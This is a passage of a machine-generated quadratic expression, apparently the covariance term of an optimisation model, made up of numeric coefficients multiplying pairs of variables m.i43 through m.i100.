0.00950324*m.i43*m.i74 + 0.00395808*m.i43*m.i75 + 0.00230734*m.i43*m.i76 + 0.01177946*m.i43*m.i77
+ 0.00120913*m.i43*m.i78 + 0.00451336*m.i43*m.i79 + 0.0087064*m.i43*m.i80 + 0.01415418*m.i43*
m.i81 + 0.00158382*m.i43*m.i82 + 0.01934448*m.i43*m.i83 + 0.01332798*m.i43*m.i84 + 0.0073079*
m.i43*m.i85 + 0.01024086*m.i43*m.i86 + 0.00333288*m.i43*m.i87 + 0.01697646*m.i43*m.i88 +
0.00457426*m.i43*m.i89 + 0.00557218*m.i43*m.i90 + 0.0103559*m.i43*m.i91 + 0.00897022*m.i43*m.i92
+ 0.00315402*m.i43*m.i93 + 0.00504118*m.i43*m.i94 + 0.01075858*m.i43*m.i95 + 0.00678594*m.i43*
m.i96 + 0.01260626*m.i43*m.i97 + 0.0163881*m.i43*m.i98 + 0.01009846*m.i43*m.i99 + 0.01154306*
m.i43*m.i100 + 0.00483446*m.i44*m.i45 + 0.00652268*m.i44*m.i46 + 0.0242272*m.i44*m.i47 +
0.00478826*m.i44*m.i48 + 0.01685648*m.i44*m.i49 + 0.020425*m.i44*m.i50 + 0.00923526*m.i44*m.i51
+ 0.01214276*m.i44*m.i52 + 0.01807778*m.i44*m.i53 + 0.01714928*m.i44*m.i54 + 0.0117815*m.i44*
m.i55 + 0.01675568*m.i44*m.i56 + 0.0065756*m.i44*m.i57 + 0.01226174*m.i44*m.i58 + 0.0107529*m.i44
*m.i59 + 0.00316098*m.i44*m.i60 + 0.0237412*m.i44*m.i61 + 0.023095*m.i44*m.i62 + 0.0261176*m.i44*
m.i63 + 0.01217274*m.i44*m.i64 + 0.01008618*m.i44*m.i65 + 0.0100818*m.i44*m.i66 + 0.01058518*
m.i44*m.i67 + 0.00547734*m.i44*m.i68 + 0.0242058*m.i44*m.i69 + 0.01131642*m.i44*m.i70 + 0.0238346
*m.i44*m.i71 + 0.01469328*m.i44*m.i72 + 0.01153818*m.i44*m.i73 + 0.0107527*m.i44*m.i74 +
0.00664436*m.i44*m.i75 + 0.00643936*m.i44*m.i76 + 0.01819866*m.i44*m.i77 + 0.00401038*m.i44*m.i78
+ 0.00860378*m.i44*m.i79 + 0.01052694*m.i44*m.i80 + 0.01791956*m.i44*m.i81 + 0.001302356*m.i44*
m.i82 + 0.024415*m.i44*m.i83 + 0.01318656*m.i44*m.i84 + 0.00691488*m.i44*m.i85 + 0.0134211*m.i44*
m.i86 + 0.01005166*m.i44*m.i87 + 0.036692*m.i44*m.i88 + 0.00614716*m.i44*m.i89 + 0.0120958*m.i44*
m.i90 + 0.00884752*m.i44*m.i91 + 0.01296164*m.i44*m.i92 + 0.00513894*m.i44*m.i93 + 0.00596534*
m.i44*m.i94 + 0.01196692*m.i44*m.i95 + 0.01664976*m.i44*m.i96 + 0.01462126*m.i44*m.i97 +
0.0157382*m.i44*m.i98 + 0.01533824*m.i44*m.i99 + 0.0188597*m.i44*m.i100 + 0.00317774*m.i45*m.i46
+ 0.00420624*m.i45*m.i47 + 0.00199361*m.i45*m.i48 + 0.0050265*m.i45*m.i49 + 0.00894044*m.i45*
m.i50 + 0.00284776*m.i45*m.i51 + 0.00547162*m.i45*m.i52 + 0.00269966*m.i45*m.i53 + 0.0064379*
m.i45*m.i54 + 0.00472118*m.i45*m.i55 + 0.0042126*m.i45*m.i56 + 0.00394074*m.i45*m.i57 +
0.00265196*m.i45*m.i58 + 0.00448504*m.i45*m.i59 + 0.001797504*m.i45*m.i60 + 0.00867806*m.i45*
m.i61 + 0.00322858*m.i45*m.i62 + 0.00607352*m.i45*m.i63 + 0.00436738*m.i45*m.i64 + 0.00237578*
m.i45*m.i65 + 0.0044976*m.i45*m.i66 + 0.00181419*m.i45*m.i67 + 0.00495262*m.i45*m.i68 +
0.00570214*m.i45*m.i69 + 0.00422674*m.i45*m.i70 + 0.001748284*m.i45*m.i71 + 0.00347868*m.i45*
m.i72 + 0.00586478*m.i45*m.i73 + 0.00333902*m.i45*m.i74 + 0.0046385*m.i45*m.i75 + 0.001228842*
m.i45*m.i76 + 0.00595824*m.i45*m.i77 + 0.0027183*m.i45*m.i78 + 0.00108409*m.i45*m.i79 +
0.00761658*m.i45*m.i80 + 0.0005468*m.i45*m.i81 + 0.001647768*m.i45*m.i82 - 0.00572218*m.i45*m.i83
+ 0.00291394*m.i45*m.i84 + 0.00667112*m.i45*m.i85 + 0.00283124*m.i45*m.i86 + 0.00214236*m.i45*
m.i87 + 0.00913532*m.i45*m.i88 + 0.0031579*m.i45*m.i89 + 0.001671266*m.i45*m.i90 + 0.007457*m.i45
*m.i91 + 0.00539294*m.i45*m.i92 + 0.001548892*m.i45*m.i93 + 0.00325768*m.i45*m.i94 + 0.00415906*
m.i45*m.i95 + 0.00472416*m.i45*m.i96 + 0.00257908*m.i45*m.i97 + 0.00311904*m.i45*m.i98 -
0.00028754*m.i45*m.i99 + 0.00641254*m.i45*m.i100 + 0.00936266*m.i46*m.i47 + 0.00551424*m.i46*
m.i48 + 0.00665328*m.i46*m.i49 + 0.01254298*m.i46*m.i50 + 0.00457552*m.i46*m.i51 + 0.00723508*
m.i46*m.i52 + 0.01013924*m.i46*m.i53 + 0.00835722*m.i46*m.i54 + 0.00612552*m.i46*m.i55 +
0.00568528*m.i46*m.i56 + 0.00506602*m.i46*m.i57 + 0.00547684*m.i46*m.i58 + 0.00630834*m.i46*m.i59
+ 0.0034076*m.i46*m.i60 + 0.01269782*m.i46*m.i61 + 0.01056202*m.i46*m.i62 + 0.00905674*m.i46*
m.i63 + 0.00727642*m.i46*m.i64 + 0.0053986*m.i46*m.i65 + 0.00499194*m.i46*m.i66 + 0.00693256*
m.i46*m.i67 + 0.00384534*m.i46*m.i68 + 0.01113952*m.i46*m.i69 + 0.00571676*m.i46*m.i70 +
0.00918194*m.i46*m.i71 + 0.00582038*m.i46*m.i72 + 0.00587208*m.i46*m.i73 + 0.00927628*m.i46*m.i74
+ 0.00540062*m.i46*m.i75 + 0.00399822*m.i46*m.i76 + 0.00599102*m.i46*m.i77 + 0.00478388*m.i46*
m.i78 + 0.0052496*m.i46*m.i79 + 0.0080323*m.i46*m.i80 + 0.00786638*m.i46*m.i81 + 0.001854684*
m.i46*m.i82 + 0.00407872*m.i46*m.i83 + 0.00621788*m.i46*m.i84 + 0.00606418*m.i46*m.i85 +
0.00669516*m.i46*m.i86 + 0.00483036*m.i46*m.i87 + 0.00889994*m.i46*m.i88 + 0.00341184*m.i46*m.i89
+ 0.00883678*m.i46*m.i90 + 0.00699852*m.i46*m.i91 + 0.00577214*m.i46*m.i92 + 0.00238288*m.i46*
m.i93 + 0.001681122*m.i46*m.i94 + 0.00660328*m.i46*m.i95 + 0.0125098*m.i46*m.i96 + 0.00829924*
m.i46*m.i97 + 0.00843732*m.i46*m.i98 + 0.00930502*m.i46*m.i99 + 0.01141018*m.i46*m.i100 +
0.00622806*m.i47*m.i48 + 0.01275134*m.i47*m.i49 + 0.0219686*m.i47*m.i50 + 0.00559252*m.i47*m.i51
+ 0.014742*m.i47*m.i52 + 0.01293552*m.i47*m.i53 + 0.0202408*m.i47*m.i54 + 0.01276622*m.i47*m.i55
+ 0.0211842*m.i47*m.i56 + 0.00751862*m.i47*m.i57 + 0.01167596*m.i47*m.i58 + 0.0096102*m.i47*
m.i59 + 0.00476024*m.i47*m.i60 + 0.0291008*m.i47*m.i61 + 0.0293252*m.i47*m.i62 + 0.0218568*m.i47*
m.i63 + 0.01597818*m.i47*m.i64 + 0.01230724*m.i47*m.i65 + 0.01074494*m.i47*m.i66 + 0.01192482*
m.i47*m.i67 + 0.0072756*m.i47*m.i68 + 0.0259978*m.i47*m.i69 + 0.01196354*m.i47*m.i70 + 0.0346772*
m.i47*m.i71 + 0.01997802*m.i47*m.i72 + 0.0109755*m.i47*m.i73 + 0.01126216*m.i47*m.i74 +
0.00543986*m.i47*m.i75 + 0.00507998*m.i47*m.i76 + 0.01031016*m.i47*m.i77 + 0.0051788*m.i47*m.i78
+ 0.001275304*m.i47*m.i79 + 0.00993436*m.i47*m.i80 + 0.0302174*m.i47*m.i81 + 0.0025327*m.i47*
m.i82 + 0.0227778*m.i47*m.i83 + 0.01358392*m.i47*m.i84 + 0.01015524*m.i47*m.i85 + 0.01402648*
m.i47*m.i86 + 0.00789154*m.i47*m.i87 + 0.0151434*m.i47*m.i88 + 0.001278866*m.i47*m.i89 +
0.0158996*m.i47*m.i90 + 0.01154264*m.i47*m.i91 + 0.01393698*m.i47*m.i92 + 0.00304714*m.i47*m.i93
+ 0.00512466*m.i47*m.i94 + 0.01429612*m.i47*m.i95 + 0.01681572*m.i47*m.i96 + 0.01931984*m.i47*
m.i97 + 0.0267484*m.i47*m.i98 + 0.01797768*m.i47*m.i99 + 0.0282598*m.i47*m.i100 + 0.00546656*
m.i48*m.i49 + 0.01037534*m.i48*m.i50 + 0.00353598*m.i48*m.i51 + 0.00756044*m.i48*m.i52 +
0.01216498*m.i48*m.i53 + 0.00967664*m.i48*m.i54 + 0.00647364*m.i48*m.i55 + 0.00302706*m.i48*m.i56
+ 0.0053717*m.i48*m.i57 + 0.00577622*m.i48*m.i58 + 0.00544272*m.i48*m.i59 + 0.00352554*m.i48*
m.i60 + 0.01442968*m.i48*m.i61 + 0.0109524*m.i48*m.i62 + 0.00913756*m.i48*m.i63 + 0.00640136*
m.i48*m.i64 + 0.00303604*m.i48*m.i65 + 0.00380586*m.i48*m.i66 + 0.00547728*m.i48*m.i67 +
0.00370642*m.i48*m.i68 + 0.00883124*m.i48*m.i69 + 0.00549652*m.i48*m.i70 + 0.00566248*m.i48*m.i71
+ 0.00467596*m.i48*m.i72 + 0.00529964*m.i48*m.i73 + 0.00953518*m.i48*m.i74 + 0.00623786*m.i48*
m.i75 + 0.00402142*m.i48*m.i76 + 0.00662892*m.i48*m.i77 + 0.004711*m.i48*m.i78 + 0.001686804*
m.i48*m.i79 + 0.00761384*m.i48*m.i80 + 0.0057658*m.i48*m.i81 + 0.00181049*m.i48*m.i82 -
0.00054847*m.i48*m.i83 + 0.0048793*m.i48*m.i84 + 0.00598068*m.i48*m.i85 + 0.00652398*m.i48*m.i86
+ 0.0036324*m.i48*m.i87 + 0.00674584*m.i48*m.i88 + 0.00354232*m.i48*m.i89 + 0.00923644*m.i48*
m.i90 + 0.01247554*m.i48*m.i91 + 0.00613734*m.i48*m.i92 + 0.000820814*m.i48*m.i93 + 0.001893008*
m.i48*m.i94 + 0.00690274*m.i48*m.i95 + 0.01623126*m.i48*m.i96 + 0.00810288*m.i48*m.i97 +
0.00702362*m.i48*m.i98 + 0.01027006*m.i48*m.i99 + 0.01224198*m.i48*m.i100 + 0.01829412*m.i49*
m.i50 + 0.0119479*m.i49*m.i51 + 0.01038228*m.i49*m.i52 + 0.01375438*m.i49*m.i53 + 0.01480194*
m.i49*m.i54 + 0.01103368*m.i49*m.i55 + 0.01464938*m.i49*m.i56 + 0.00724638*m.i49*m.i57 +
0.00857364*m.i49*m.i58 + 0.0149174*m.i49*m.i59 + 0.00407556*m.i49*m.i60 + 0.0214208*m.i49*m.i61
+ 0.01655784*m.i49*m.i62 + 0.01832206*m.i49*m.i63 + 0.0099515*m.i49*m.i64 + 0.01025382*m.i49*
m.i65 + 0.00862324*m.i49*m.i66 + 0.00863512*m.i49*m.i67 + 0.0076467*m.i49*m.i68 + 0.0220404*m.i49
*m.i69 + 0.0095053*m.i49*m.i70 + 0.01307838*m.i49*m.i71 + 0.01047408*m.i49*m.i72 + 0.01294838*
m.i49*m.i73 + 0.01471132*m.i49*m.i74 + 0.00851398*m.i49*m.i75 + 0.00575748*m.i49*m.i76 +
0.0145716*m.i49*m.i77 + 0.00460678*m.i49*m.i78 + 0.01570596*m.i49*m.i79 + 0.00985226*m.i49*m.i80
+ 0.01023644*m.i49*m.i81 + 0.00369278*m.i49*m.i82 + 0.00860988*m.i49*m.i83 + 0.01393008*m.i49*
m.i84 + 0.00839504*m.i49*m.i85 + 0.01483048*m.i49*m.i86 + 0.01071222*m.i49*m.i87 + 0.0344974*
m.i49*m.i88 + 0.00962838*m.i49*m.i89 + 0.01169418*m.i49*m.i90 + 0.01045396*m.i49*m.i91 +
0.0095482*m.i49*m.i92 + 0.00539536*m.i49*m.i93 + 0.00663516*m.i49*m.i94 + 0.01120512*m.i49*m.i95
+ 0.01484196*m.i49*m.i96 + 0.0127009*m.i49*m.i97 + 0.01167858*m.i49*m.i98 + 0.01477446*m.i49*
m.i99 + 0.01842494*m.i49*m.i100 + 0.01663076*m.i50*m.i51 + 0.021828*m.i50*m.i52 + 0.029083*m.i50*
m.i53 + 0.0230518*m.i50*m.i54 + 0.01639088*m.i50*m.i55 + 0.01308142*m.i50*m.i56 + 0.01225642*
m.i50*m.i57 + 0.0094199*m.i50*m.i58 + 0.0222192*m.i50*m.i59 + 0.00884396*m.i50*m.i60 + 0.0415716*
m.i50*m.i61 + 0.032076*m.i50*m.i62 + 0.021259*m.i50*m.i63 + 0.01432872*m.i50*m.i64 + 0.01445944*
m.i50*m.i65 + 0.01098896*m.i50*m.i66 + 0.0219658*m.i50*m.i67 + 0.01066588*m.i50*m.i68 + 0.0354768
*m.i50*m.i69 + 0.01575178*m.i50*m.i70 + 0.01775054*m.i50*m.i71 + 0.01436852*m.i50*m.i72 +
0.01353572*m.i50*m.i73 + 0.01936092*m.i50*m.i74 + 0.01665002*m.i50*m.i75 + 0.00971184*m.i50*m.i76
+ 0.01642836*m.i50*m.i77 + 0.01382168*m.i50*m.i78 + 0.0341934*m.i50*m.i79 + 0.01843884*m.i50*
m.i80 + 0.01940942*m.i50*m.i81 + 0.00527464*m.i50*m.i82 + 0.00829608*m.i50*m.i83 + 0.0138699*
m.i50*m.i84 + 0.01840912*m.i50*m.i85 + 0.0210266*m.i50*m.i86 + 0.0205286*m.i50*m.i87 + 0.0451728*
m.i50*m.i88 + 0.01361116*m.i50*m.i89 + 0.0277252*m.i50*m.i90 + 0.01783032*m.i50*m.i91 +
0.01982086*m.i50*m.i92 + 0.00668064*m.i50*m.i93 + 0.00765962*m.i50*m.i94 + 0.01980832*m.i50*m.i95
+ 0.043863*m.i50*m.i96 + 0.0241266*m.i50*m.i97 + 0.0216094*m.i50*m.i98 + 0.0284306*m.i50*m.i99
+ 0.0308476*m.i50*m.i100 + 0.01058872*m.i51*m.i52 + 0.01279448*m.i51*m.i53 + 0.0112444*m.i51*
m.i54 + 0.00990216*m.i51*m.i55 + 0.00896022*m.i51*m.i56 + 0.00513818*m.i51*m.i57 + 0.00543454*
m.i51*m.i58 + 0.01870256*m.i51*m.i59 + 0.00309084*m.i51*m.i60 + 0.01767624*m.i51*m.i61 +
0.01208918*m.i51*m.i62 + 0.01086364*m.i51*m.i63 + 0.00670046*m.i51*m.i64 + 0.00877154*m.i51*m.i65
+ 0.00557174*m.i51*m.i66 + 0.00887856*m.i51*m.i67 + 0.00260902*m.i51*m.i68 + 0.01536338*m.i51*
m.i69 + 0.00483316*m.i51*m.i70 + 0.00448378*m.i51*m.i71 + 0.0043601*m.i51*m.i72 + 0.00929772*
m.i51*m.i73 + 0.00989476*m.i51*m.i74 + 0.00528028*m.i51*m.i75 + 0.00446022*m.i51*m.i76 +
0.00845848*m.i51*m.i77 + 0.00509916*m.i51*m.i78 + 0.0204202*m.i51*m.i79 + 0.00800384*m.i51*m.i80
+ 0.00529538*m.i51*m.i81 + 0.0038846*m.i51*m.i82 + 0.00772216*m.i51*m.i83 + 0.009979*m.i51*m.i84
+ 0.010097*m.i51*m.i85 + 0.0139755*m.i51*m.i86 + 0.01131734*m.i51*m.i87 + 0.02533*m.i51*m.i88 +
0.00621034*m.i51*m.i89 + 0.01160734*m.i51*m.i90 + 0.00843408*m.i51*m.i91 + 0.00995326*m.i51*m.i92
+ 0.00455616*m.i51*m.i93 + 0.00533468*m.i51*m.i94 + 0.00929878*m.i51*m.i95 + 0.0142337*m.i51*
m.i96 + 0.01066822*m.i51*m.i97 + 0.00526832*m.i51*m.i98 + 0.01737382*m.i51*m.i99 + 0.01465192*
m.i51*m.i100 + 0.01484222*m.i52*m.i53 + 0.0171371*m.i52*m.i54 + 0.01181392*m.i52*m.i55 +
0.00600344*m.i52*m.i56 + 0.00840878*m.i52*m.i57 + 0.0071463*m.i52*m.i58 + 0.01536778*m.i52*m.i59
+ 0.0071369*m.i52*m.i60 + 0.0280962*m.i52*m.i61 + 0.0210708*m.i52*m.i62 + 0.01590808*m.i52*m.i63
+ 0.01317442*m.i52*m.i64 + 0.0091774*m.i52*m.i65 + 0.0068045*m.i52*m.i66 + 0.01047574*m.i52*
m.i67 + 0.00882116*m.i52*m.i68 + 0.01759098*m.i52*m.i69 + 0.00927774*m.i52*m.i70 + 0.01307496*
m.i52*m.i71 + 0.0115876*m.i52*m.i72 + 0.01090888*m.i52*m.i73 + 0.0112976*m.i52*m.i74 + 0.00919952
*m.i52*m.i75 + 0.00611904*m.i52*m.i76 + 0.0126521*m.i52*m.i77 + 0.0063454*m.i52*m.i78 +
0.01337936*m.i52*m.i79 + 0.01210696*m.i52*m.i80 + 0.01264942*m.i52*m.i81 + 0.00476554*m.i52*m.i82
+ 0.01346924*m.i52*m.i83 + 0.01007318*m.i52*m.i84 + 0.0127267*m.i52*m.i85 + 0.01394736*m.i52*
m.i86 + 0.0099746*m.i52*m.i87 + 0.0311922*m.i52*m.i88 + 0.0079236*m.i52*m.i89 + 0.01182038*m.i52*
m.i90 + 0.01651678*m.i52*m.i91 + 0.01241554*m.i52*m.i92 + 0.0030009*m.i52*m.i93 + 0.00533038*
m.i52*m.i94 + 0.0132025*m.i52*m.i95 + 0.0243106*m.i52*m.i96 + 0.01594256*m.i52*m.i97 + 0.01260958
*m.i52*m.i98 + 0.0156343*m.i52*m.i99 + 0.01771086*m.i52*m.i100 + 0.0153737*m.i53*m.i54 +
0.01383672*m.i53*m.i55 + 0.00715324*m.i53*m.i56 + 0.00943676*m.i53*m.i57 + 0.00990018*m.i53*m.i58
+ 0.01573366*m.i53*m.i59 + 0.00657884*m.i53*m.i60 + 0.0319944*m.i53*m.i61 + 0.029398*m.i53*m.i62
+ 0.01378922*m.i53*m.i63 + 0.01107682*m.i53*m.i64 + 0.01095454*m.i53*m.i65 + 0.00681218*m.i53*
m.i66 + 0.01767184*m.i53*m.i67 + 0.00360916*m.i53*m.i68 + 0.0271974*m.i53*m.i69 + 0.01108326*
m.i53*m.i70 + 0.00659666*m.i53*m.i71 + 0.00877032*m.i53*m.i72 + 0.01135242*m.i53*m.i73 +
0.01814298*m.i53*m.i74 + 0.01264072*m.i53*m.i75 + 0.00851402*m.i53*m.i76 + 0.01433306*m.i53*m.i77
+ 0.00973382*m.i53*m.i78 + 0.025286*m.i53*m.i79 + 0.01345344*m.i53*m.i80 + 0.01259382*m.i53*
m.i81 + 0.0027805*m.i53*m.i82 + 0.000307752*m.i53*m.i83 + 0.0107134*m.i53*m.i84 + 0.01054482*
m.i53*m.i85 + 0.0158905*m.i53*m.i86 + 0.01354224*m.i53*m.i87 + 0.0304602*m.i53*m.i88 + 0.0090225*
m.i53*m.i89 + 0.0279162*m.i53*m.i90 + 0.01259072*m.i53*m.i91 + 0.01154418*m.i53*m.i92 +
0.00696904*m.i53*m.i93 + 0.0036836*m.i53*m.i94 + 0.01605638*m.i53*m.i95 + 0.0430698*m.i53*m.i96
+ 0.01780592*m.i53*m.i97 + 0.01137144*m.i53*m.i98 + 0.0256234*m.i53*m.i99 + 0.0212362*m.i53*
m.i100 + 0.01304758*m.i54*m.i55 + 0.01398616*m.i54*m.i56 + 0.00915664*m.i54*m.i57 + 0.01070596*
m.i54*m.i58 + 0.01499*m.i54*m.i59 + 0.0070249*m.i54*m.i60 + 0.0302542*m.i54*m.i61 + 0.0244214*
m.i54*m.i62 + 0.0228504*m.i54*m.i63 + 0.01378888*m.i54*m.i64 + 0.00915648*m.i54*m.i65 + 0.0089268
*m.i54*m.i66 + 0.010488*m.i54*m.i67 + 0.00997224*m.i54*m.i68 + 0.0229576*m.i54*m.i69 + 0.01077794
*m.i54*m.i70 + 0.01825372*m.i54*m.i71 + 0.01517784*m.i54*m.i72 + 0.01258444*m.i54*m.i73 +
0.01361126*m.i54*m.i74 + 0.01029832*m.i54*m.i75 + 0.00657472*m.i54*m.i76 + 0.01463254*m.i54*m.i77
+ 0.00613474*m.i54*m.i78 + 0.01201368*m.i54*m.i79 + 0.013126*m.i54*m.i80 + 0.01505614*m.i54*
m.i81 + 0.00467872*m.i54*m.i82 + 0.01050702*m.i54*m.i83 + 0.01265914*m.i54*m.i84 + 0.01318044*
m.i54*m.i85 + 0.01473222*m.i54*m.i86 + 0.01110614*m.i54*m.i87 + 0.0261814*m.i54*m.i88 +
0.00783796*m.i54*m.i89 + 0.01294844*m.i54*m.i90 + 0.0192808*m.i54*m.i91 + 0.0139507*m.i54*m.i92
+ 0.00351228*m.i54*m.i93 + 0.0068612*m.i54*m.i94 + 0.01527036*m.i54*m.i95 + 0.0205052*m.i54*
m.i96 + 0.01688726*m.i54*m.i97 + 0.01524852*m.i54*m.i98 + 0.0174601*m.i54*m.i99 + 0.0244266*m.i54
*m.i100 + 0.00673562*m.i55*m.i56 + 0.00707698*m.i55*m.i57 + 0.00734322*m.i55*m.i58 + 0.01405048*
m.i55*m.i59 + 0.00334038*m.i55*m.i60 + 0.0222096*m.i55*m.i61 + 0.01523028*m.i55*m.i62 + 0.0102055
*m.i55*m.i63 + 0.01002768*m.i55*m.i64 + 0.01048288*m.i55*m.i65 + 0.00635712*m.i55*m.i66 +
0.00874464*m.i55*m.i67 + 0.00593524*m.i55*m.i68 + 0.01648812*m.i55*m.i69 + 0.0080135*m.i55*m.i70
+ 0.00887592*m.i55*m.i71 + 0.00847214*m.i55*m.i72 + 0.01055314*m.i55*m.i73 + 0.01129422*m.i55*
m.i74 + 0.00699156*m.i55*m.i75 + 0.00627446*m.i55*m.i76 + 0.01024268*m.i55*m.i77 + 0.00531432*
m.i55*m.i78 + 0.0098513*m.i55*m.i79 + 0.01065934*m.i55*m.i80 + 0.00967318*m.i55*m.i81 +
0.00462964*m.i55*m.i82 + 0.00334858*m.i55*m.i83 + 0.01100528*m.i55*m.i84 + 0.00975296*m.i55*m.i85
+ 0.01214742*m.i55*m.i86 + 0.00846042*m.i55*m.i87 + 0.0242638*m.i55*m.i88 + 0.0054702*m.i55*
m.i89 + 0.01124098*m.i55*m.i90 + 0.0118002*m.i55*m.i91 + 0.01077996*m.i55*m.i92 + 0.00250778*
m.i55*m.i93 + 0.00555816*m.i55*m.i94 + 0.01037364*m.i55*m.i95 + 0.0175302*m.i55*m.i96 +
0.01283314*m.i55*m.i97 + 0.01054116*m.i55*m.i98 + 0.01565736*m.i55*m.i99 + 0.01643682*m.i55*
m.i100 + 0.00563824*m.i56*m.i57 + 0.00909602*m.i56*m.i58 + 0.0103611*m.i56*m.i59 + 0.00370386*
m.i56*m.i60 + 0.01345496*m.i56*m.i61 + 0.01240364*m.i56*m.i62 + 0.01894134*m.i56*m.i63 +
0.00842246*m.i56*m.i64 + 0.00913306*m.i56*m.i65 + 0.0128603*m.i56*m.i66 + 0.00789202*m.i56*m.i67
+ 0.0049437*m.i56*m.i68 + 0.0172921*m.i56*m.i69 + 0.00742364*m.i56*m.i70 + 0.0201228*m.i56*m.i71
+ 0.0118952*m.i56*m.i72 + 0.01088666*m.i56*m.i73 + 0.0107701*m.i56*m.i74 + 0.00409754*m.i56*
m.i75 + 0.00366002*m.i56*m.i76 + 0.01236854*m.i56*m.i77 + 0.00300872*m.i56*m.i78 + 0.0135613*
m.i56*m.i79 + 0.00480806*m.i56*m.i80 + 0.01596128*m.i56*m.i81 + 0.00309564*m.i56*m.i82 +
0.01777436*m.i56*m.i83 + 0.01193038*m.i56*m.i84 + 0.00565974*m.i56*m.i85 + 0.01170688*m.i56*m.i86
+ 0.01022376*m.i56*m.i87 + 0.0163427*m.i56*m.i88 + 0.00612568*m.i56*m.i89 + 0.01115784*m.i56*
m.i90 + 0.00381802*m.i56*m.i91 + 0.0089326*m.i56*m.i92 + 0.0075443*m.i56*m.i93 + 0.00818402*m.i56
*m.i94 + 0.00966992*m.i56*m.i95 + 0.00265106*m.i56*m.i96 + 0.01019204*m.i56*m.i97 + 0.01329902*
m.i56*m.i98 + 0.01411634*m.i56*m.i99 + 0.0138779*m.i56*m.i100 + 0.00474894*m.i57*m.i58 +
0.00767974*m.i57*m.i59 + 0.0043561*m.i57*m.i60 + 0.01478228*m.i57*m.i61 + 0.00989558*m.i57*m.i62
+ 0.00895424*m.i57*m.i63 + 0.0066828*m.i57*m.i64 + 0.00578744*m.i57*m.i65 + 0.00498864*m.i57*
m.i66 + 0.00614268*m.i57*m.i67 + 0.0054738*m.i57*m.i68 + 0.01078148*m.i57*m.i69 + 0.00688352*
m.i57*m.i70 + 0.0068114*m.i57*m.i71 + 0.00628102*m.i57*m.i72 + 0.00701898*m.i57*m.i73 +
0.00848154*m.i57*m.i74 + 0.0066742*m.i57*m.i75 + 0.00450208*m.i57*m.i76 + 0.0074907*m.i57*m.i77
+ 0.00457588*m.i57*m.i78 + 0.00668368*m.i57*m.i79 + 0.00806954*m.i57*m.i80 + 0.00702352*m.i57*
m.i81 + 0.0038917*m.i57*m.i82 + 0.000255196*m.i57*m.i83 + 0.00565464*m.i57*m.i84 + 0.00629044*
m.i57*m.i85 + 0.00649918*m.i57*m.i86 + 0.00619514*m.i57*m.i87 + 0.01578988*m.i57*m.i88 +
0.00523946*m.i57*m.i89 + 0.00717944*m.i57*m.i90 + 0.0080494*m.i57*m.i91 + 0.00534064*m.i57*m.i92
+ 0.00276512*m.i57*m.i93 + 0.00412012*m.i57*m.i94 + 0.00715034*m.i57*m.i95 + 0.01300638*m.i57*
m.i96 + 0.00826382*m.i57*m.i97 + 0.0068466*m.i57*m.i98 + 0.00897648*m.i57*m.i99 + 0.01037138*
m.i57*m.i100 + 0.00646004*m.i58*m.i59 + 0.00186599*m.i58*m.i60 + 0.01246886*m.i58*m.i61 +
0.00999352*m.i58*m.i62 + 0.01381952*m.i58*m.i63 + 0.00855014*m.i58*m.i64 + 0.00465434*m.i58*m.i65
+ 0.00825376*m.i58*m.i66 + 0.00576402*m.i58*m.i67 + 0.00273548*m.i58*m.i68 + 0.01035762*m.i58*
m.i69 + 0.004824*m.i58*m.i70 + 0.01355144*m.i58*m.i71 + 0.00700278*m.i58*m.i72 + 0.00707718*m.i58
*m.i73 + 0.00851974*m.i58*m.i74 + 0.00330912*m.i58*m.i75 + 0.00401842*m.i58*m.i76 + 0.00999942*
m.i58*m.i77 + 0.00277578*m.i58*m.i78 - 0.000989722*m.i58*m.i79 + 0.00742188*m.i58*m.i80 +
0.00901096*m.i58*m.i81 + 0.000981242*m.i58*m.i82 + 0.01290728*m.i58*m.i83 + 0.0083181*m.i58*m.i84
+ 0.00517936*m.i58*m.i85 + 0.00723458*m.i58*m.i86 + 0.0044253*m.i58*m.i87 + 0.0137847*m.i58*
m.i88 + 0.001547694*m.i58*m.i89 + 0.00582604*m.i58*m.i90 + 0.00844516*m.i58*m.i91 + 0.00776542*
m.i58*m.i92 + 0.00182761*m.i58*m.i93 + 0.0023829*m.i58*m.i94 + 0.00628056*m.i58*m.i95 +
0.00690478*m.i58*m.i96 + 0.00802988*m.i58*m.i97 + 0.0076502*m.i58*m.i98 + 0.01085276*m.i58*m.i99
+ 0.0112764*m.i58*m.i100 + 0.00476864*m.i59*m.i60 + 0.025812*m.i59*m.i61 + 0.01805478*m.i59*
m.i62 + 0.0109551*m.i59*m.i63 + 0.00938908*m.i59*m.i64 + 0.01178962*m.i59*m.i65 + 0.0076335*m.i59
*m.i66 + 0.01177666*m.i59*m.i67 + 0.0070214*m.i59*m.i68 + 0.0221478*m.i59*m.i69 + 0.007972*m.i59*
m.i70 + 0.0074733*m.i59*m.i71 + 0.0088486*m.i59*m.i72 + 0.01271666*m.i59*m.i73 + 0.0141508*m.i59*
m.i74 + 0.00914726*m.i59*m.i75 + 0.00537448*m.i59*m.i76 + 0.01084216*m.i59*m.i77 + 0.0073258*
m.i59*m.i78 + 0.0246694*m.i59*m.i79 + 0.01112936*m.i59*m.i80 + 0.00816652*m.i59*m.i81 +
0.00597972*m.i59*m.i82 + 0.00662172*m.i59*m.i83 + 0.01458364*m.i59*m.i84 + 0.01429256*m.i59*m.i85
+ 0.01882618*m.i59*m.i86 + 0.01439702*m.i59*m.i87 + 0.034478*m.i59*m.i88 + 0.0080275*m.i59*m.i89
+ 0.01623632*m.i59*m.i90 + 0.01482176*m.i59*m.i91 + 0.01127396*m.i59*m.i92 + 0.00550568*m.i59*
m.i93 + 0.00798042*m.i59*m.i94 + 0.01294416*m.i59*m.i95 + 0.0212862*m.i59*m.i96 + 0.01627426*
m.i59*m.i97 + 0.0106876*m.i59*m.i98 + 0.021021*m.i59*m.i99 + 0.0210024*m.i59*m.i100 + 0.01016558*
m.i60*m.i61 + 0.00950624*m.i60*m.i62 + 0.00759926*m.i60*m.i63 + 0.00405624*m.i60*m.i64 +
0.00408766*m.i60*m.i65 + 0.001012866*m.i60*m.i66 + 0.00434698*m.i60*m.i67 + 0.00457798*m.i60*
m.i68 + 0.0080193*m.i60*m.i69 + 0.0054101*m.i60*m.i70 + 0.0046192*m.i60*m.i71 + 0.00570946*m.i60*
m.i72 + 0.00452172*m.i60*m.i73 + 0.00634618*m.i60*m.i74 + 0.00624388*m.i60*m.i75 + 0.0033187*
m.i60*m.i76 + 0.00483228*m.i60*m.i77 + 0.00344686*m.i60*m.i78 + 0.0083673*m.i60*m.i79 +
